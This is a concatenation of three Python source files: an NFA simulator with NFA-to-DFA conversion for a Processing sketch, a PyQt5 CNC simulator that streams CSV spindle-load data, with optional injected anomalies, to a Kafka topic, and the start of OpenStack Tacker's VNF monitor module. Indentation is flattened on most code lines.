t.start()
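    # _analyze runs on a background thread so the Processing sketch keeps
    # drawing: it breadth-first simulates the NFA, briefly highlighting the
    # currently reachable states, then expanding epsilon-moves (same remaining
    # input) and single-character moves (input shortened by one symbol).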
def _analyze(self, message):
if not self._isValid():
print('This NFA is missing some transitions')
return False
if not self._validMessage(message):
print('The message has to consist of characters from the alphabet')
return False
curr = [(self._states[0], message)]
while len(curr) != 0:
for state, _ in curr:
state.setActive(True)
sleep(.4)
for state, _ in curr:
state.setActive(False)
tmp = []
while len(curr) > 0:
s, m = curr.pop(0)
if len(m) == 0 and s.isFinal():
return True
tmp.extend(map(lambda x: (x, m), self._transitions[(s, '')]))
if len(m) > 0:
tmp.extend(map(lambda x: (x, m[1:]), self._transitions[(s, m[0])]))
curr = tmp
return False
def handleLeftClick(self):
for state in self._states:
if state.handleClick(mouseX, mouseY):
if self._selected == None:
self._selected = state
return state
else:
self._choosingChar = True
self._callback = lambda c : self._transitions[(self._selected, c)].remove(state) if state in self._transitions[(self._selected, c)] else self.setTransition(self._selected, c, state)
return state
self._selected = None
def handleRightClick(self):
for state in self._states:
if state.handleClick(mouseX, mouseY):
state.setFinish(not state.isFinal())
def handleDoubleClick(self):
for state in self._states:
if state.handleClick(mouseX, mouseY):
self.removeState(state)
if self._selected == state:
self._selected = None
self._choosingChar = False
return state
self.addState(DrawableState(False, False, mouseX, mouseY))
def handleDrag(self):
for state in self._states:
if state.handleClick(pmouseX, pmouseY):
state.moveTo(mouseX, mouseY)
return state
def handleKeyPresses(self):
if not self._choosingChar:
return False
if key == '\n':
self._callback(self._chosenChar)
self._choosingChar = False
self._callback = None
self._selected = None
self._chosenChar = ''
elif keyCode == BACKSPACE:
self._chosenChar = ''
else:
self._chosenChar = key
return True
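    # toDFA is the classic subset construction: every non-empty subset of NFA
    # states is epsilon-closed into a candidate DFA state, a DFA state accepts
    # when it contains an accepting NFA state, and its transition on c is the
    # epsilon-closure of the union of its members' transitions on c.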
def toDFA(self):
powerset = []
for i in range(1, (1 << len(self._states))):
sset = set()
for j in range(len(self._states)):
if i & (1 << j) != 0:
sset.add(self._states[j])
powerset.append(sset)
powerset = list(map(self._eclosure, powerset))
#print(len(powerset))
#print(powerset)
        alph = [c for c in self._alphabet if c != '']  # copy, so the NFA keeps its own epsilon entry
dfa = DrawableDFA(alph, 50, 100)
for state in powerset[0]:
if state.isFinal():
dfa.getState(0).setFinish(True)
for i in range(1, len(powerset)):
dfa.addState(DrawableState(False, False, 100 + 100 * (i % 14), 100 + 100 * (i // 8)))
for state in powerset[i]:
if state.isFinal():
dfa.getState(i).setFinish(True)
break
for i in range(len(powerset)):
for c in alph:
dstSet = set()
#print('setting transition for : ' + str((dfa.getState(i), c)))
for s in powerset[i]:
dstSet = dstSet.union(self._eclosure(set(self._transitions[(s,c)])))
dfa.setTransition(dfa.getState(i), c, dfa.getState(powerset.index(dstSet)))
dfa.trim()
return dfa
|
CncSimulatorSprint1.py
|
import os, sys, time, csv
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QThread
from kafka import KafkaProducer
import threading
class Ui_CNC_Simulator(object):
def __init__(self):
# self.history = os.path.isfile('./tmp')
self.data = None
self.flag = False
self.makeAnomal = False
self.start = 0
self.end = 0
self.logs = ''
self.interval = 0.05
self.producer = KafkaProducer(bootstrap_servers=['9.8.100.152:9092'])
self.topic = 'MH001001001-CNC001'
self.kafkaSendThread = threading.Thread(target=self.SendData, name="kafkaSendThread", args=())
self.kafkaSendThread.start()
self.anomalyLog = ''
def setupUi(self, CNC_Simulator):
CNC_Simulator.setObjectName("CNC_Simulator")
CNC_Simulator.resize(1256, 603)
# icon = QtGui.QIcon()
# icon.addPixmap(QtGui.QPixmap("D:/Users/1027a/Downloads/tmp/logo2.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
# CNC_Simulator.setWindowIcon(icon)
CNC_Simulator.setStyleSheet("background-color: #0a1a33;")
self.centralwidget = QtWidgets.QWidget(CNC_Simulator)
self.centralwidget.setObjectName("centralwidget")
self.header = QtWidgets.QLabel(self.centralwidget)
self.header.setGeometry(QtCore.QRect(15, 7, 1231, 31))
self.header.setStyleSheet("Color: white; font: 75 20pt \"URW Gothic L\"; font-weight: 700;")
self.header.setAlignment(QtCore.Qt.AlignCenter)
self.header.setObjectName("header")
self.error = QtWidgets.QMessageBox()
self.error.setWindowTitle("ERROR!")
self.error.setIcon(QtWidgets.QMessageBox.Critical)
self.info = QtWidgets.QMessageBox()
self.info.setWindowTitle("INFOMATION")
        self.info.setIcon(QtWidgets.QMessageBox.Information)
self.module1 = QtWidgets.QLabel(self.centralwidget)
self.module1.setGeometry(QtCore.QRect(13, 47, 588, 308))
self.module1.setStyleSheet("background-color: #092c4c; border-radius: 10px;")
self.module1.setObjectName("module1")
self.filePath = QtWidgets.QLabel(self.centralwidget)
self.filePath.setGeometry(QtCore.QRect(23, 60, 488, 31))
self.filePath.setStyleSheet("Color: white; border: 1.5px solid gray; background-color: #3a475a; font: 75 10pt \"URW Gothic L\"; border-radius: 5px")
self.filePath.setObjectName("filePath")
self.browsBtn = QtWidgets.QPushButton(self.centralwidget)
self.browsBtn.setGeometry(QtCore.QRect(515, 59, 79, 31))
self.browsBtn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.browsBtn.setStyleSheet("Color: white; background-color: #0F79DB; font-size: 11pt; font-weight: 600; border-radius: 5px;")
self.browsBtn.setObjectName("browsBtn")
self.fileInfo = QtWidgets.QLabel(self.centralwidget)
self.fileInfo.setAlignment(QtCore.Qt.AlignTop)
self.fileInfo.setGeometry(QtCore.QRect(23, 97, 570, 252))
self.fileInfo.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.fileInfo.setStyleSheet("Color: white; background-color: #3a475a; font: 75 10pt \"URW Gothic L\"; border-radius: 5px; padding: 3px;")
self.fileInfo.setObjectName("fileInfo")
self.module2 = QtWidgets.QLabel(self.centralwidget)
self.module2.setGeometry(QtCore.QRect(11, 474, 590, 112))
self.module2.setStyleSheet("background-color: #092c4c; border-radius: 10px;")
self.module2.setObjectName("module2")
end = QtWidgets.QLabel(self.centralwidget)
end.setGeometry(QtCore.QRect(218, 482, 182, 17))
end.setStyleSheet("Color: white; background-color: #092c4c; font: 75 13pt \"URW Gothic L\";")
end.setAlignment(QtCore.Qt.AlignCenter)
end.setObjectName("end")
end.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "end index"))
self.endIndex = QtWidgets.QLineEdit(self.centralwidget)
self.endIndex.setGeometry(QtCore.QRect(217, 506, 186, 25))
self.endIndex.setValidator(QtGui.QIntValidator(0,999999999))
self.endIndex.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.endIndex.setObjectName("endIndex")
self.tilde = QtWidgets.QLabel(self.centralwidget)
self.tilde.setGeometry(QtCore.QRect(203, 484, 15, 16))
self.tilde.setStyleSheet("Color: white; background-color: #092c4c; font-size: 20pt;")
self.tilde.setObjectName("tilde")
interval = QtWidgets.QLabel(self.centralwidget)
interval.setGeometry(QtCore.QRect(417, 482, 144, 17))
interval.setStyleSheet("Color: white; background-color: #092c4c; font: 75 13pt \"URW Gothic L\";")
interval.setAlignment(QtCore.Qt.AlignCenter)
interval.setObjectName("interval")
interval.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "interval"))
self.intervalInput = QtWidgets.QLineEdit(self.centralwidget)
self.intervalInput.setGeometry(QtCore.QRect(416, 506, 147, 25))
self.intervalInput.setValidator(QtGui.QIntValidator(0,999999999))
self.intervalInput.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.intervalInput.setObjectName("intervalInput")
self.intervalInput.setText("50")
self.startAndStopBtn = QtWidgets.QPushButton(self.centralwidget)
self.startAndStopBtn.setGeometry(QtCore.QRect(21, 546, 280, 31))
self.startAndStopBtn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.startAndStopBtn.setStyleSheet("Color: white; background-color: #0F79DB; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.startAndStopBtn.setObjectName("startAndStopBtn")
self.ms = QtWidgets.QLabel(self.centralwidget)
self.ms.setGeometry(QtCore.QRect(567, 514, 27, 17))
self.ms.setStyleSheet("Color: white; background-color: #092c4c; font: 75 11.5pt \"URW Gothic L\";")
self.ms.setObjectName("ms")
self.pauseAndResumeBtn = QtWidgets.QPushButton(self.centralwidget)
self.pauseAndResumeBtn.setGeometry(QtCore.QRect(312, 546, 281, 31))
self.pauseAndResumeBtn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.pauseAndResumeBtn.setStyleSheet("Color: white; background-color: #808080; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.pauseAndResumeBtn.setObjectName("pauseAndResumeBtn")
self.pauseAndResumeBtn.setEnabled(False)
start = QtWidgets.QLabel(self.centralwidget)
start.setGeometry(QtCore.QRect(29, 482, 176, 17))
start.setStyleSheet("Color: white; background-color: #092c4c; font: 75 13pt \"URW Gothic L\";")
start.setAlignment(QtCore.Qt.AlignCenter)
start.setObjectName("start")
start.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "start index"))
self.startIndex = QtWidgets.QLineEdit(self.centralwidget)
self.startIndex.setGeometry(QtCore.QRect(26, 506, 179, 25))
self.startIndex.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.startIndex.setObjectName("startIndex")
self.startIndex.setValidator(QtGui.QIntValidator(0,999999999))
label = QtWidgets.QLabel(self.centralwidget)
label.setGeometry(QtCore.QRect(613, 47, 630, 540))
label.setStyleSheet("background-color: #092c4c; border-radius: 10px;")
label.setObjectName("label")
self.consoleLog = QtWidgets.QTextEdit(self.centralwidget)
self.consoleLog.setGeometry(QtCore.QRect(624, 114, 610, 464))
self.consoleLog.setStyleSheet("Color: white; background-color: #3a475a; border: 1.5px solid gray; font: 75 10pt \"URW Gothic L\"; border-bottom-right-radius: 5px; border-bottom-left-radius: 5px; border-top-style: none;")
self.consoleLog.setObjectName("consoleLog")
self.consoleLog.setReadOnly(True)
self.consolLog_h = QtWidgets.QLineEdit(self.centralwidget)
self.consolLog_h.setGeometry(QtCore.QRect(624, 83, 610, 31))
self.consolLog_h.setStyleSheet(" border-top-right-radius: 5px; border-top-left-radius: 5px; Color: white; background-color: #3a475a; border: 1.5px solid gray; font: 75 11.3pt \"URW Gothic L\"; border-bottom-style: none;")
self.consolLog_h.setObjectName("consolLog_h")
self.consolLog_h.setReadOnly(True)
self.consoleLog.document().setMaximumBlockCount(500)
self.consoleHeader = QtWidgets.QLabel(self.centralwidget)
self.consoleHeader.setGeometry(QtCore.QRect(614, 51, 621, 25))
self.consoleHeader.setStyleSheet("Color: white; background-color: #092c4c; font: 75 13pt \"URW Gothic L\" ; font-weight: 500;")
self.consoleHeader.setAlignment(QtCore.Qt.AlignCenter)
self.consoleHeader.setObjectName("consoleHeader")
self.logo = QtWidgets.QLabel(self.centralwidget)
self.logo.setGeometry(QtCore.QRect(10, 7, 71, 35))
self.logo.setStyleSheet("image: url(\'D:/Users/1027a/Downloads/tmp/logo.png\');")
self.logo.setObjectName("logo")
self.clear = QtWidgets.QPushButton(self.centralwidget)
self.clear.setGeometry(QtCore.QRect(1168, 55, 61, 22))
self.clear.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.clear.setStyleSheet("Color: white; background-color: #0F79DB; font-size: 9pt; font-weight: 600; border-radius: 5px;")
self.clear.setObjectName("clear")
self.module3 = QtWidgets.QLabel(self.centralwidget)
self.module3.setGeometry(QtCore.QRect(12, 361, 590, 106))
self.module3.setStyleSheet("background-color: #092c4c; border-radius: 10px;")
self.module3.setObjectName("module3")
self.nomalORnot = QtWidgets.QGroupBox(self.centralwidget)
self.nomalORnot.setGeometry(QtCore.QRect(22, 365, 181, 95))
self.nomalORnot.setStyleSheet("Color:white; border-radius: 5px; background-color: #3a475a; font: 75 11pt \"URW Gothic L\";")
self.nomalORnot.setAlignment(QtCore.Qt.AlignCenter)
self.nomalORnot.setObjectName("nomalORnot")
self.nomal = QtWidgets.QRadioButton(self.nomalORnot)
self.nomal.setGeometry(QtCore.QRect(10, 34, 112, 23))
self.nomal.setStyleSheet("font: 75 10pt \"URW Gothic L\"; Color: white;")
self.nomal.setObjectName("nomal")
self.nomal.setChecked(True)
self.anomaly = QtWidgets.QRadioButton(self.nomalORnot)
self.anomaly.setGeometry(QtCore.QRect(10, 64, 112, 23))
self.anomaly.setStyleSheet("font: 75 10pt \"URW Gothic L\"; Color: white;")
self.anomaly.setObjectName("anomaly")
self.subMenu = QtWidgets.QGroupBox(self.centralwidget)
self.subMenu.setGeometry(QtCore.QRect(212, 365, 381, 95))
self.subMenu.setStyleSheet("Color:white; border-radius: 5px; background-color: #3a475a; font: 75 11pt \"URW Gothic L\";")
self.subMenu.setAlignment(QtCore.Qt.AlignCenter)
self.subMenu.setObjectName("subMenu")
self.kindOfAnomaly = QtWidgets.QComboBox(self.subMenu)
self.kindOfAnomaly.setGeometry(QtCore.QRect(35, 34, 131, 27))
self.kindOfAnomaly.setStyleSheet("background-color: #4A515D; Color: white;")
self.kindOfAnomaly.setObjectName("kindOfAnomaly")
self.kindOfAnomaly.addItem("Static")
self.kindOfAnomaly.addItem("Increase")
self.kindOfAnomaly.addItem("Decrease")
self.kindOfAnomaly.hide()
self.kindOfAnomaly.currentIndexChanged.connect(self.ComboChageSet)
self.unitInput = QtWidgets.QLineEdit(self.subMenu)
self.unitInput.setGeometry(QtCore.QRect(175, 34, 161, 28))
self.unitInput.setStyleSheet("background-color: #4A515D; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.unitInput.setObjectName("unitInput")
self.unitInput.setAlignment(QtCore.Qt.AlignRight)
self.unitInput.hide()
self.unit = QtWidgets.QLabel(self.subMenu)
self.unit.setGeometry(QtCore.QRect(341, 41, 20, 17))
self.unit.setStyleSheet("Color: white; background-color: #3a475a; font: 75 11.5pt \"URW Gothic L\";")
self.unit.setObjectName("unit")
self.unit.hide()
self.apply = QtWidgets.QPushButton(self.subMenu)
self.apply.setGeometry(QtCore.QRect(3, 67, 375, 25))
self.apply.setStyleSheet("Color: white; background-color: #0F79DB; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.apply.setObjectName("apply")
self.apply.hide()
self.nextStep = QtWidgets.QLabel(self.subMenu)
self.nextStep.setGeometry(QtCore.QRect(130, 40, 171, 31))
self.nextStep.setStyleSheet("font: 75 13pt \"URW Gothic L\";")
self.nextStep.setObjectName("nextStep")
CNC_Simulator.setCentralWidget(self.centralwidget)
self.RetranslateUi(CNC_Simulator)
self.GiveActionToObject()
QtCore.QMetaObject.connectSlotsByName(CNC_Simulator)
def RetranslateUi(self, CNC_Simulator):
_translate = QtCore.QCoreApplication.translate
CNC_Simulator.setWindowTitle(_translate("CNC_Simulator", "CNC Simulator - HNinc"))
self.header.setText(_translate("CNC_Simulator", "CNC Simulator"))
self.filePath.setText(_translate("CNC_Simulator", "Choose File.."))
self.browsBtn.setText(_translate("CNC_Simulator", "Open"))
self.fileInfo.setText(_translate("CNC_Simulator", "File info"))
self.tilde.setText(_translate("CNC_Simulator", "~"))
self.startAndStopBtn.setText(_translate("CNC_Simulator", "Start"))
self.ms.setText(_translate("CNC_Simulator", "ms"))
self.pauseAndResumeBtn.setText(_translate("CNC_Simulator", "Pause"))
self.consoleHeader.setText(_translate("CNC_Simulator", "Stream LoadSpindle"))
self.clear.setText(_translate("CNC_Simulator", "Clear"))
self.nomalORnot.setTitle(_translate("CNC_Simulator", "choose data type"))
self.nomal.setText(_translate("CNC_Simulator", "nomal"))
self.anomaly.setText(_translate("CNC_Simulator", "Anomaly"))
self.subMenu.setTitle(_translate("CNC_Simulator", "Option"))
self.nextStep.setText(_translate("CNC_Simulator", "Take the next step"))
self.consolLog_h.setText(_translate("CNC_Simulator", " Count, OpCode, Time, LoadSpindle, Tcode, TotalCnt, X, Y, Z"))
self.apply.setText(_translate("CNC_Simulator", "apply"))
def GiveActionToObject(self):
self.browsBtn.clicked.connect(self.FileExplorer)
self.startAndStopBtn.clicked.connect(self.StartAndStopData)
self.pauseAndResumeBtn.clicked.connect(self.PauseAndResumeData)
self.clear.clicked.connect(self.ClearConsole)
self.nomal.clicked.connect(self.AnomalyUiAction)
self.anomaly.clicked.connect(self.AnomalyUiAction)
self.apply.clicked.connect(self.ApplyAction)
def ClearConsole(self):
self.consoleLog.clear()
def ComboChageSet(self):
if self.kindOfAnomaly.currentIndex() == 0:
self.makeAnomal = False
self.unit.setText('')
self.anomalyLog = ''
self.unitInput.setValidator(QtGui.QIntValidator(0,99999999))
return
if self.kindOfAnomaly.currentIndex() > 0:
self.makeAnomal = False
self.unit.setText('%')
self.unitInput.setValidator(QtGui.QIntValidator(0,999))
return
def AnomalyUiAction(self):
if self.nomal.isChecked():
self.nextStep.show()
self.unit.hide()
self.unitInput.hide()
self.kindOfAnomaly.hide()
self.apply.hide()
self.makeAnomal = False
self.anomalyLog = ''
if self.anomaly.isChecked():
self.nextStep.hide()
self.unit.show()
self.unitInput.show()
self.kindOfAnomaly.show()
self.apply.show()
def ApplyAction(self):
if not self.flag:
self.error.setText("시뮬레이터가 시작 중인지 확인해주세요.")
self.error.exec()
elif self.unitInput.text() == '':
self.error.setText("anomaly input을 확인해 주세요.")
self.error.exec()
else:
self.percent = int(self.unitInput.text())
if self.kindOfAnomaly.currentIndex() == 2 and self.percent > 100:
self.error.setText("100%초과하여 데이터를 감소할 수 없습니다.")
self.error.exec()
else:
self.makeAnomal = True
def FileExplorer(self):
FileOpen = QtWidgets.QFileDialog.getOpenFileName(None, 'Open file', './', 'csv(*.csv)')
if FileOpen[0] != '':
QtWidgets.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
self.filePath.setText(FileOpen[0])
self.ReadData()
def ReadData(self):
        with open(self.filePath.text(), 'r') as file:
            read = list(csv.reader(file))
self.data = []
if len(read[0]) > 13:
self.data.append(read[0])
flag = True
for line in read:
if flag:
flag = False
else:
tmp = line[(len(line)-5):(len(line)-1)]
line = line[:(len(line)-5)]
flag = True
for i in tmp:
if flag:
flag = False
else:
if i.find(']') != -1:
i = i.split(']')
i = i[0]
line[4] = i
self.data.append([i for i in line])
else:
self.data = read
row = (len(self.data))
column = len(self.data[0])
self.startIndex.setText('1')
self.endIndex.setText(str(row))
        info = ''
        for r in range(14):
            info = info + ' '.join(self.data[r][:11]) + ' .... \n'
        info = info + '... ... ... ... ... ... ... ... ... ... ... \n'
info = info + '[ ' + str(row)+' rows X '+ str(column) + ' columns ]'
self.fileInfo.setText(info)
QtWidgets.QApplication.restoreOverrideCursor()
print("Read done")
def CheckException(self):
        if self.data is None:
            self.error.setText("Please select a csv file first.")
self.error.exec()
return False
if self.intervalInput.text() == "":
self.error.setText("interval을 입력해주세요.")
self.error.exec()
return False
if self.startIndex.text() == "":
self.error.setText("start를 입력해주세요.")
self.error.exec()
return False
if self.endIndex.text() == "":
self.error.setText("end를 입력해주세요.")
self.error.exec()
return False
if int(self.startIndex.text()) < 1:
self.error.setText("start의 최소 값은 1입니다.\nstart index를 확인해주세요.")
self.error.exec()
return False
if int(self.endIndex.text()) < int(self.startIndex.text()):
self.error.setText("end의 최소 값은" + str(int(self.startIndex.text())+1) + "입니다.\nend index를 확인해주세요.")
self.error.exec()
return False
if int(self.intervalInput.text()) < 10:
self.error.setText("시뮬레이터 성능을 위하여 interval의 최소 값은 10입니다.\ninterval을 확인해주세요.")
self.error.exec()
return False
return True
def PauseAndResumeData(self):
check = self.CheckException()
if check:
if self.pauseAndResumeBtn.text() == 'Pause':
self.pauseAndResumeBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Resume"))
self.flag = False
else:
self.pauseAndResumeBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Pause"))
self.flag = True
def StartAndStopData(self):
check = self.CheckException()
if check:
if self.startAndStopBtn.text() == 'Start':
self.startAndStopBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Stop"))
self.startAndStopBtn.setStyleSheet("background-color: #bd253e; Color: white; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.pauseAndResumeBtn.setStyleSheet("background-color: #0F79DB;Color: white; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.pauseAndResumeBtn.setEnabled(True)
                self.start = int(self.startIndex.text())
                self.startTmp = self.start  # remember the original start index; SendData restores it after a full run
self.end = int(self.endIndex.text())
self.interval = int(self.intervalInput.text())/1000
self.startIndex.setReadOnly(True)
self.startIndex.setStyleSheet("background-color: #092c4c; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.endIndex.setReadOnly(True)
self.endIndex.setStyleSheet("background-color: #092c4c; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.intervalInput.setReadOnly(True)
self.intervalInput.setStyleSheet("background-color: #092c4c; Color: white; border: 1.5px solid gray; border-radius: 5px;")
if self.end <= self.start:
self.error.setText("현재 데이터 전송이 시작될 인덱스는 " +str(self.start) + "입니다.\n 시작 인덱스보다 끝 인덱스가 더 작습니다.\n 확인해주세요.")
self.error.exec()
else:
self.flag = True
else:
self.startAndStopBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Start"))
self.pauseAndResumeBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Pause"))
self.startAndStopBtn.setStyleSheet("background-color: #0F79DB; Color: white; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.pauseAndResumeBtn.setEnabled(False)
self.pauseAndResumeBtn.setStyleSheet("background-color: #808080;Color: white; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.flag = False
self.logs = self.logs[:-1]
self.consoleLog.append(self.logs)
# self.consoleLog.moveCursor(QtGui.QTextCursor.End)
self.logs = ''
self.startIndex.setReadOnly(False)
self.startIndex.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.endIndex.setReadOnly(False)
self.endIndex.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.intervalInput.setReadOnly(False)
self.intervalInput.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
def SendData(self):
sendInterval = 0
while True:
if self.flag:
if self.end >= self.start:
timeCurrent = time.time()
line = self.data[self.start]
if self.makeAnomal:
index = self.kindOfAnomaly.currentIndex()
if index > 0:
if index == 1:
trans = int(int(line[4]) * ((self.percent/100)+1))
self.anomalyLog = 'Anomaly Mode(Increase):: LoadSpindle Value is changed ' + line[4] + ' ==> ' + str(trans) +'\n'
else:
trans = int(int(line[4]) * (1-(self.percent/100) ))
self.anomalyLog = 'Anomaly Mode(Decrease):: LoadSpindle Value is changed ' + line[4] + ' ==> ' + str(trans) +'\n'
line[4] = str(trans)
else:
self.anomalyLog = 'Anomaly Mode(Static):: LoadSpindle Value is changed ' + line[4] + ' ==> ' + str(self.percent) +'\n'
line[4] = str(self.percent)
line[1] = str(timeCurrent * 1000)
self.logs = self.logs + str(self.start) + '. ' + line[0] + ', ' + time.strftime('%Y-%m-%d %H:%M:%S.{}'.format(str(timeCurrent).split('.')[1][:3]), time.localtime(timeCurrent)) + ', ' + line[4] + ', ' + line[8] + ', ' + line[-4] + ', ' + line[-3]+ ', ' + line[-2] + ', ' + line[-1] + '\n' + self.anomalyLog
send = ','.join(line)
sendInterval += self.interval
send = send.encode('utf-8')
self.producer.send(self.topic,send)
self.start += 1
if self.end-self.start < 0.999/self.interval or sendInterval > 0.999:
if self.logs != '':
sendInterval = 0
self.logs = self.logs[:-1]
self.consoleLog.append(self.logs)
# self.consoleLog.moveCursor(QtGui.QTextCursor.End)
self.logs = ''
                else: # the transfer has finished
                    self.consoleLog.append(str(self.end - self.startTmp + 1) + ' records have been sent.')
self.start = self.startTmp
self.startAndStopBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Stop"))
self.StartAndStopData()
time.sleep(self.interval)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
CNC_Simulator = QtWidgets.QMainWindow()
ui = Ui_CNC_Simulator()
ui.setupUi(CNC_Simulator)
CNC_Simulator.show()
os._exit(app.exec_())
|
monitor.py
|
# Copyright 2015 Intel Corporation.
# All Rights Reserved.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import copy
import inspect
import random
import string
import threading
import time
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from tacker._i18n import _
from tacker.common import driver_manager
from tacker.common import exceptions
from tacker import context as t_context
from tacker.plugins.common import constants
from tacker.vnfm import utils as vnfm_utils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
OPTS = [
cfg.IntOpt('check_intvl',
default=10,
help=_("check interval for monitor")),
]
CONF.register_opts(OPTS, group='monitor')
def config_opts():
return [('monitor', OPTS),
('tacker', VNFMonitor.OPTS),
('tacker', VNFAlarmMonitor.OPTS),
('tacker', VNFAppMonitor.OPTS)]
class VNFMonitor(object):
"""VNF Monitor."""
_instance = None
_hosting_vnfs = dict() # vnf_id => dict of parameters
_status_check_intvl = 0
_lock = threading.RLock()
OPTS = [
cfg.ListOpt(
'monitor_driver', default=['ping', 'http_ping'],
help=_('Monitor driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
def __new__(cls, boot_wait, check_intvl=None):
if not cls._instance:
cls._instance = super(VNFMonitor, cls).__new__(cls)
return cls._instance
def __init__(self, boot_wait, check_intvl=None):
self._monitor_manager = driver_manager.DriverManager(
'tacker.tacker.monitor.drivers',
cfg.CONF.tacker.monitor_driver)
self.boot_wait = boot_wait
if check_intvl is None:
check_intvl = cfg.CONF.monitor.check_intvl
self._status_check_intvl = check_intvl
LOG.debug('Spawning VNF monitor thread')
threading.Thread(target=self.__run__).start()
def __run__(self):
        while True:
time.sleep(self._status_check_intvl)
with self._lock:
for hosting_vnf in VNFMonitor._hosting_vnfs.values():
if hosting_vnf.get('dead', False) or (
hosting_vnf['vnf']['status'] ==
constants.PENDING_HEAL):
LOG.debug(
'monitor skips for DEAD/PENDING_HEAL vnf %s',
hosting_vnf)
continue
try:
self.run_monitor(hosting_vnf)
except Exception as ex:
LOG.exception("Unknown exception: Monitoring failed "
"for VNF '%s' due to '%s' ",
hosting_vnf['id'], ex)
@staticmethod
def to_hosting_vnf(vnf_dict, action_cb):
return {
'id': vnf_dict['id'],
'mgmt_ip_addresses': jsonutils.loads(
vnf_dict['mgmt_ip_address']),
'action_cb': action_cb,
'vnf': vnf_dict,
'monitoring_policy': jsonutils.loads(
vnf_dict['attributes']['monitoring_policy'])
}
def add_hosting_vnf(self, new_vnf):
LOG.debug('Adding host %(id)s, Mgmt IP %(ips)s',
{'id': new_vnf['id'],
'ips': new_vnf['mgmt_ip_addresses']})
new_vnf['boot_at'] = timeutils.utcnow()
with self._lock:
VNFMonitor._hosting_vnfs[new_vnf['id']] = new_vnf
attrib_dict = new_vnf['vnf']['attributes']
mon_policy_dict = attrib_dict['monitoring_policy']
evt_details = (("VNF added for monitoring. "
"mon_policy_dict = %s,") % (mon_policy_dict))
vnfm_utils.log_events(t_context.get_admin_context(),
new_vnf['vnf'],
constants.RES_EVT_MONITOR, evt_details)
def delete_hosting_vnf(self, vnf_id):
LOG.debug('deleting vnf_id %(vnf_id)s', {'vnf_id': vnf_id})
with self._lock:
hosting_vnf = VNFMonitor._hosting_vnfs.pop(vnf_id, None)
if hosting_vnf:
LOG.debug('deleting vnf_id %(vnf_id)s, Mgmt IP %(ips)s',
{'vnf_id': vnf_id,
'ips': hosting_vnf['mgmt_ip_addresses']})
def update_hosting_vnf(self, updated_vnf_dict, evt_details=None):
with self._lock:
vnf_to_update = VNFMonitor._hosting_vnfs.get(
updated_vnf_dict.get('id'))
if vnf_to_update:
updated_vnf = copy.deepcopy(updated_vnf_dict)
vnf_to_update['vnf'] = updated_vnf
vnf_to_update['mgmt_ip_addresses'] = jsonutils.loads(
updated_vnf_dict['mgmt_ip_address'])
if evt_details is not None:
vnfm_utils.log_events(t_context.get_admin_context(),
vnf_to_update['vnf'],
constants.RES_EVT_HEAL,
evt_details=evt_details)
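    # run_monitor expects 'monitoring_policy' shaped roughly like the
    # illustrative dict below (field names inferred from the code that
    # follows; the concrete drivers and actions depend on the deployed VNFD):
    #
    #   {'monitoring_delay': 45,
    #    'vdus': {'VDU1': {'ping': {'monitoring_params': {'count': 3},
    #                               'actions': {'failure': 'respawn'}}}}}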
def run_monitor(self, hosting_vnf):
mgmt_ips = hosting_vnf['mgmt_ip_addresses']
vdupolicies = hosting_vnf['monitoring_policy']['vdus']
vnf_delay = hosting_vnf['monitoring_policy'].get(
'monitoring_delay', self.boot_wait)
for vdu in vdupolicies:
if hosting_vnf.get('dead') or (
hosting_vnf['vnf']['status']) == constants.PENDING_HEAL:
return
policy = vdupolicies[vdu]
for driver in policy:
params = policy[driver].get('monitoring_params', {})
vdu_delay = params.get('monitoring_delay', vnf_delay)
if not timeutils.is_older_than(hosting_vnf['boot_at'],
vdu_delay):
continue
actions = policy[driver].get('actions', {})
